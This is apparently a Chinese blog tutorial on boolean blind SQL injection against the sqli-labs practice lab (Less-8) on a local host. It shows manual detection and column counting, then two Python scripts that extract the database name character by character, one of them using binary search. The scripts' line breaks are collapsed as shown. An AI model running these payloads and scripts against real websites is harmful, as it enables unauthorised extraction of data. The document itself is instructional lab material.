目录

盲注步骤

1、进入靶场

2、如下图所示输入？id=1‘ 判断此时存在注入点

3、判断列数

​编辑 4、开始盲注

普通的python脚本

代码思想

结果

二分查找python脚本

二分查找算法思想简介

二分查找与普通查找的主要差距

代码思想

代码

结果​编辑

---

下面以sql_labs靶场第八关来理解一下bool盲注

盲注步骤

1、进入靶场

2、如下图所示输入？id=1‘ 判断此时存在注入点

3、判断列数

列又3变为4时You are in.....消失，说明存在三列 

 4、开始盲注

然后我们可以开始进行注入，可以使用substr函数对数据库名进行猜测。对substr切割出来的字符进行一个ascli编码，然后和ascli编码比较，根据结果确定数据库的名称

如下图，当你测试到115时，图中会显示You are in...

然后可以调整sql语句，直到找到database()的名字，但是如果手动一个个的话要花费的时间太久了，所以我们编写一个python脚本来进行盲注

普通的python脚本

代码思想

创建一个字符集然后数据库的每个位置的字符和字符集中的字符进行比对，若两者相等则字符集中字符存入dataname中，最终显示dataname

代码

# 白大黑
# 开发时间：$[DATE] $[TIME]
import requests
def get_database(url):dataname = ''  # 初始化一个空字符串用于存储数据库名dict = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'  #数据库名可能存在这些字段中# 循环数据库名的位置for i in range(1, 20):for j in dict:#注入语句payload = "1' AND SUBSTRING((SELECT DATABASE()), %d, 1) = '%s'-- " % (i, j)# 发送请求res = requests.get(url, params={"id": payload})# 如果字符匹配上了，屏幕会输出You are in，所以可以用You are in来检测是否字符是否可以匹配if "You are in" in res.text:dataname += jprint(dataname)breakelse:continuereturn dataname# 此处填写自己靶场地址
url = 'http://127.0.0.1:9002/sqli-labs-master/Less-8/'
db_name = get_database(url)

结果

二分查找python脚本

但时刚刚的脚本还不是很好，它的查找速率不是很快。所以我们可以对算法进行一下优化，将上面的代码中查找的算法替换成二分查找。

二分查找算法思想简介

二分法的思想很简单，因为整个数组是有序的，数组默认是递增的。

首先选择数组中间的数字和需要查找的目标值比较

如果相等最好，就可以直接返回答案了

如果不相等

如果中间的数字大于目标值，则中间数字向右的所有数字都大于目标值，全部排除

如果中间的数字小于目标值，则中间数字向左的所有数字都小于目标值，全部排除

二分查找与普通查找的主要差距

效率：二分查找的效率远高于普通查找。由于二分查找采用了分治策略，每次都将查找范围缩小一半，因此其时间复杂度为O(log n)，而普通查找的时间复杂度为O(n)。

前提条件：二分查找要求数组必须是有序的，而普通查找则没有这一要求。因此，在使用二分查找之前，需要先对数组进行排序。

应用场景：由于二分查找效率高，因此适用于大规模数据的查找；而普通查找则更适用于小规模数据或对数据有序性没有要求的情况。

（正好我们的盲注过程符合二分查找的条件）

代码思想

将要查找的字段编码成ascii码，同ascii码进行比较，ascii相同，该ascii对应的字母就是数据库名称

同ascii进行比较的那一段换成二分法。

代码

 

# 白大黑
# 开发时间：$[DATE] $[TIME]
import requests
def half(url):name = ''for i in range(1, 20):#从空格开始 直到到~low = 32high = 126mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(),%d,1))> %d-- " % (i, mid)params = {"id":payload}r = requests.get(url, params=params)if 'You are in' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname += chr(mid)print(name)
url = 'http://127.0.0.1:9002/sqli-labs-master/Less-8/'
half(url)

结果